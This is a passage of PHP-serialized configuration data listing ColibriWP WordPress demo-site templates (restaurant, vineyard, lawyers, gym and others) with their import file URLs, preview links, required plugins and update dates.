14:44:17.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:9;a:11:{s:16:\"import_file_name\";s:10:\"Restaurant\";s:4:\"slug\";s:10:\"restaurant\";s:10:\"categories\";a:1:{i:0;s:10:\"food-drink\";}s:15:\"import_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/restaurant/content.xml\";s:22:\"import_widget_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/restaurant/widgets.wie\";s:26:\"import_customizer_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/restaurant/customizer.dat\";s:24:\"import_preview_image_url\";s:92:\"https://static.colibriwp.com/templates-screenshots/colibri_default_restaurant/screenshot.png\";s:11:\"preview_url\";s:48:\"https://colibriwp-work.colibriwp.com/restaurant/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:19.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:10;a:11:{s:16:\"import_file_name\";s:10:\"Vineyard I\";s:4:\"slug\";s:8:\"vineyard\";s:10:\"categories\";a:1:{i:0;s:10:\"food-drink\";}s:15:\"import_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/vineyard/content.xml\";s:22:\"import_widget_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/vineyard/widgets.wie\";s:26:\"import_customizer_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/vineyard/customizer.dat\";s:24:\"import_preview_image_url\";s:74:\"https://static.colibriwp.com/templates-screenshots/vineyard/screenshot.png\";s:11:\"preview_url\";s:47:\"https://colibriwp-work.colibriwp.com/vineyard-i\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:22.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:11;a:11:{s:16:\"import_file_name\";s:11:\"Vineyard II\";s:4:\"slug\";s:11:\"vineyard-ii\";s:10:\"categories\";a:1:{i:0;s:10:\"food-drink\";}s:15:\"import_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/vineyard-ii/content.xml\";s:22:\"import_widget_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/vineyard-ii/widgets.wie\";s:26:\"import_customizer_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/vineyard-ii/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/vineyard-ii/screenshot.png\";s:11:\"preview_url\";s:48:\"https://colibriwp-work.colibriwp.com/vineyard-ii\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:01:39.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:12;a:11:{s:16:\"import_file_name\";s:9:\"My Resume\";s:4:\"slug\";s:9:\"my-resume\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/my-resume/content.xml\";s:22:\"import_widget_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/my-resume/widgets.wie\";s:26:\"import_customizer_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/my-resume/customizer.dat\";s:24:\"import_preview_image_url\";s:91:\"https://static.colibriwp.com/templates-screenshots/colibri_default_my-resume/screenshot.png\";s:11:\"preview_url\";s:47:\"https://colibriwp-work.colibriwp.com/my-resume/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:24.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:13;a:11:{s:16:\"import_file_name\";s:7:\"Lawyers\";s:4:\"slug\";s:7:\"lawyers\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/lawyers/content.xml\";s:22:\"import_widget_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/lawyers/widgets.wie\";s:26:\"import_customizer_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/lawyers/customizer.dat\";s:24:\"import_preview_image_url\";s:73:\"https://static.colibriwp.com/templates-screenshots/lawyers/screenshot.png\";s:11:\"preview_url\";s:44:\"https://colibriwp-work.colibriwp.com/lawyers\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:51:24.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:14;a:11:{s:16:\"import_file_name\";s:10:\"Conference\";s:4:\"slug\";s:10:\"conference\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/conference/content.xml\";s:22:\"import_widget_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/conference/widgets.wie\";s:26:\"import_customizer_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/conference/customizer.dat\";s:24:\"import_preview_image_url\";s:76:\"https://static.colibriwp.com/templates-screenshots/conference/screenshot.jpg\";s:11:\"preview_url\";s:47:\"https://colibriwp-work.colibriwp.com/conference\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:11.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:15;a:11:{s:16:\"import_file_name\";s:17:\"Wedding Planner I\";s:4:\"slug\";s:17:\"wedding-planner-i\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:94:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/wedding-planner-i/content.xml\";s:22:\"import_widget_file_url\";s:94:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/wedding-planner-i/widgets.wie\";s:26:\"import_customizer_file_url\";s:97:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/wedding-planner-i/customizer.dat\";s:24:\"import_preview_image_url\";s:83:\"https://static.colibriwp.com/templates-screenshots/wedding-planner-i/screenshot.jpg\";s:11:\"preview_url\";s:54:\"https://colibriwp-work.colibriwp.com/wedding-planner-i\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:12.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:16;a:11:{s:16:\"import_file_name\";s:18:\"Wedding Planner II\";s:4:\"slug\";s:18:\"wedding-planner-ii\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/wedding-planner-ii/content.xml\";s:22:\"import_widget_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/wedding-planner-ii/widgets.wie\";s:26:\"import_customizer_file_url\";s:98:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/wedding-planner-ii/customizer.dat\";s:24:\"import_preview_image_url\";s:84:\"https://static.colibriwp.com/templates-screenshots/wedding-planner-ii/screenshot.png\";s:11:\"preview_url\";s:55:\"https://colibriwp-work.colibriwp.com/wedding-planner-ii\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:27.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:17;a:11:{s:16:\"import_file_name\";s:12:\"Architecture\";s:4:\"slug\";s:12:\"architecture\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/architecture/content.xml\";s:22:\"import_widget_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/architecture/widgets.wie\";s:26:\"import_customizer_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/architecture/customizer.dat\";s:24:\"import_preview_image_url\";s:94:\"https://static.colibriwp.com/templates-screenshots/colibri_default_architecture/screenshot.png\";s:11:\"preview_url\";s:50:\"https://colibriwp-work.colibriwp.com/architecture/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:51:27.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:18;a:11:{s:16:\"import_file_name\";s:6:\"Barber\";s:4:\"slug\";s:6:\"barber\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/barber/content.xml\";s:22:\"import_widget_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/barber/widgets.wie\";s:26:\"import_customizer_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/barber/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/template-21/screenshot.jpg\";s:11:\"preview_url\";s:43:\"https://colibriwp-work.colibriwp.com/barber\";s:7:\"plugins\";a:2:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:30:\"MC4WP: Mailchimp for WordPress\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-03-22 09:05:40.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:19;a:11:{s:16:\"import_file_name\";s:8:\"Coffee I\";s:4:\"slug\";s:8:\"coffee-i\";s:10:\"categories\";a:1:{i:0;s:10:\"food-drink\";}s:15:\"import_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coffee-i/content.xml\";s:22:\"import_widget_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coffee-i/widgets.wie\";s:26:\"import_customizer_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coffee-i/customizer.dat\";s:24:\"import_preview_image_url\";s:74:\"https://static.colibriwp.com/templates-screenshots/coffee-i/screenshot.png\";s:11:\"preview_url\";s:45:\"https://colibriwp-work.colibriwp.com/coffee-i\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:18.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:20;a:11:{s:16:\"import_file_name\";s:9:\"Coffee II\";s:4:\"slug\";s:9:\"coffee-ii\";s:10:\"categories\";a:1:{i:0;s:10:\"food-drink\";}s:15:\"import_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coffee-ii/content.xml\";s:22:\"import_widget_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coffee-ii/widgets.wie\";s:26:\"import_customizer_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coffee-ii/customizer.dat\";s:24:\"import_preview_image_url\";s:75:\"https://static.colibriwp.com/templates-screenshots/coffee-ii/screenshot.png\";s:11:\"preview_url\";s:46:\"https://colibriwp-work.colibriwp.com/coffee-ii\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:20.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:21;a:11:{s:16:\"import_file_name\";s:15:\"Interior Design\";s:4:\"slug\";s:15:\"interior-design\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/interior-design/content.xml\";s:22:\"import_widget_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/interior-design/widgets.wie\";s:26:\"import_customizer_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/interior-design/customizer.dat\";s:24:\"import_preview_image_url\";s:81:\"https://static.colibriwp.com/templates-screenshots/interior-design/screenshot.png\";s:11:\"preview_url\";s:52:\"https://colibriwp-work.colibriwp.com/interior-design\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:51:33.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:22;a:11:{s:16:\"import_file_name\";s:4:\"Yoga\";s:4:\"slug\";s:4:\"yoga\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:81:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/yoga/content.xml\";s:22:\"import_widget_file_url\";s:81:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/yoga/widgets.wie\";s:26:\"import_customizer_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/yoga/customizer.dat\";s:24:\"import_preview_image_url\";s:70:\"https://static.colibriwp.com/templates-screenshots/yoga/screenshot.png\";s:11:\"preview_url\";s:41:\"https://colibriwp-work.colibriwp.com/yoga\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:32.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:23;a:11:{s:16:\"import_file_name\";s:13:\"Constructions\";s:4:\"slug\";s:13:\"constructions\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/constructions/content.xml\";s:22:\"import_widget_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/constructions/widgets.wie\";s:26:\"import_customizer_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/constructions/customizer.dat\";s:24:\"import_preview_image_url\";s:79:\"https://static.colibriwp.com/templates-screenshots/constructions/screenshot.png\";s:11:\"preview_url\";s:50:\"https://colibriwp-work.colibriwp.com/constructions\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:51:35.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:24;a:11:{s:16:\"import_file_name\";s:11:\"Pets Clinic\";s:4:\"slug\";s:11:\"pets-clinic\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/pets-clinic/content.xml\";s:22:\"import_widget_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/pets-clinic/widgets.wie\";s:26:\"import_customizer_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/pets-clinic/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/pets-clinic/screenshot.png\";s:11:\"preview_url\";s:48:\"https://colibriwp-work.colibriwp.com/pets-clinic\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:51:37.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:25;a:11:{s:16:\"import_file_name\";s:10:\"Ski Resort\";s:4:\"slug\";s:10:\"ski-resort\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/ski-resort/content.xml\";s:22:\"import_widget_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/ski-resort/widgets.wie\";s:26:\"import_customizer_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/ski-resort/customizer.dat\";s:24:\"import_preview_image_url\";s:76:\"https://static.colibriwp.com/templates-screenshots/ski-resort/screenshot.png\";s:11:\"preview_url\";s:47:\"https://colibriwp-work.colibriwp.com/ski-resort\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:51:39.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:26;a:11:{s:16:\"import_file_name\";s:18:\"Creative Agency II\";s:4:\"slug\";s:18:\"creative-agency-ii\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/creative-agency-ii/content.xml\";s:22:\"import_widget_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/creative-agency-ii/widgets.wie\";s:26:\"import_customizer_file_url\";s:98:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/creative-agency-ii/customizer.dat\";s:24:\"import_preview_image_url\";s:84:\"https://static.colibriwp.com/templates-screenshots/creative-agency-ii/screenshot.png\";s:11:\"preview_url\";s:55:\"https://colibriwp-work.colibriwp.com/creative-agency-ii\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:39.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:27;a:11:{s:16:\"import_file_name\";s:5:\"Sushi\";s:4:\"slug\";s:5:\"sushi\";s:10:\"categories\";a:1:{i:0;s:10:\"food-drink\";}s:15:\"import_file_url\";s:82:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/sushi/content.xml\";s:22:\"import_widget_file_url\";s:82:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/sushi/widgets.wie\";s:26:\"import_customizer_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/sushi/customizer.dat\";s:24:\"import_preview_image_url\";s:71:\"https://static.colibriwp.com/templates-screenshots/sushi/screenshot.png\";s:11:\"preview_url\";s:42:\"https://colibriwp-work.colibriwp.com/sushi\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:42.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:28;a:11:{s:16:\"import_file_name\";s:22:\"Designer Portfolio III\";s:4:\"slug\";s:22:\"designer-portfolio-iii\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-portfolio-iii/content.xml\";s:22:\"import_widget_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-portfolio-iii/widgets.wie\";s:26:\"import_customizer_file_url\";s:102:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-portfolio-iii/customizer.dat\";s:24:\"import_preview_image_url\";s:88:\"https://static.colibriwp.com/templates-screenshots/designer-portfolio-iii/screenshot.png\";s:11:\"preview_url\";s:59:\"https://colibriwp-work.colibriwp.com/designer-portfolio-iii\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:51:44.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:29;a:11:{s:16:\"import_file_name\";s:3:\"Gym\";s:4:\"slug\";s:3:\"gym\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:80:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/gym/content.xml\";s:22:\"import_widget_file_url\";s:80:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/gym/widgets.wie\";s:26:\"import_customizer_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/gym/customizer.dat\";s:24:\"import_preview_image_url\";s:85:\"https://static.colibriwp.com/templates-screenshots/colibri_default_gym/screenshot.png\";s:11:\"preview_url\";s:46:\"https://colibriwp-work.colibriwp.com/gym-demo/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:51:46.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:30;a:11:{s:16:\"import_file_name\";s:9:\"Religious\";s:4:\"slug\";s:9:\"religious\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/religious/content.xml\";s:22:\"import_widget_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/religious/widgets.wie\";s:26:\"import_customizer_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/religious/customizer.dat\";s:24:\"import_preview_image_url\";s:75:\"https://static.colibriwp.com/templates-screenshots/religious/screenshot.jpg\";s:11:\"preview_url\";s:47:\"https://colibriwp-work.colibriwp.com/religious/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:34.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:31;a:11:{s:16:\"import_file_name\";s:14:\"Medical Clinic\";s:4:\"slug\";s:17:\"medical-clinic-ii\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:94:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/medical-clinic-ii/content.xml\";s:22:\"import_widget_file_url\";s:94:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/medical-clinic-ii/widgets.wie\";s:26:\"import_customizer_file_url\";s:97:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/medical-clinic-ii/customizer.dat\";s:24:\"import_preview_image_url\";s:83:\"https://static.colibriwp.com/templates-screenshots/medical-clinic-ii/screenshot.png\";s:11:\"preview_url\";s:55:\"https://colibriwp-work.colibriwp.com/medical-clinic-ii/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:36.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:32;a:11:{s:16:\"import_file_name\";s:5:\"Detox\";s:4:\"slug\";s:5:\"detox\";s:10:\"categories\";a:1:{i:0;s:10:\"food-drink\";}s:15:\"import_file_url\";s:82:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/detox/content.xml\";s:22:\"import_widget_file_url\";s:82:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/detox/widgets.wie\";s:26:\"import_customizer_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/detox/customizer.dat\";s:24:\"import_preview_image_url\";s:71:\"https://static.colibriwp.com/templates-screenshots/detox/screenshot.png\";s:11:\"preview_url\";s:43:\"https://colibriwp-work.colibriwp.com/detox/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:37.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:33;a:11:{s:16:\"import_file_name\";s:6:\"School\";s:4:\"slug\";s:6:\"school\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/school/content.xml\";s:22:\"import_widget_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/school/widgets.wie\";s:26:\"import_customizer_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/school/customizer.dat\";s:24:\"import_preview_image_url\";s:72:\"https://static.colibriwp.com/templates-screenshots/school/screenshot.png\";s:11:\"preview_url\";s:44:\"https://colibriwp-work.colibriwp.com/school/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:39.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:34;a:11:{s:16:\"import_file_name\";s:6:\"Movers\";s:4:\"slug\";s:6:\"movers\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/movers/content.xml\";s:22:\"import_widget_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/movers/widgets.wie\";s:26:\"import_customizer_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/movers/customizer.dat\";s:24:\"import_preview_image_url\";s:72:\"https://static.colibriwp.com/templates-screenshots/movers/screenshot.png\";s:11:\"preview_url\";s:44:\"https://colibriwp-work.colibriwp.com/movers/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:40.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:35;a:11:{s:16:\"import_file_name\";s:8:\"Aquarium\";s:4:\"slug\";s:8:\"aquarium\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/aquarium/content.xml\";s:22:\"import_widget_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/aquarium/widgets.wie\";s:26:\"import_customizer_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/aquarium/customizer.dat\";s:24:\"import_preview_image_url\";s:74:\"https://static.colibriwp.com/templates-screenshots/aquarium/screenshot.png\";s:11:\"preview_url\";s:46:\"https://colibriwp-work.colibriwp.com/aquarium/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 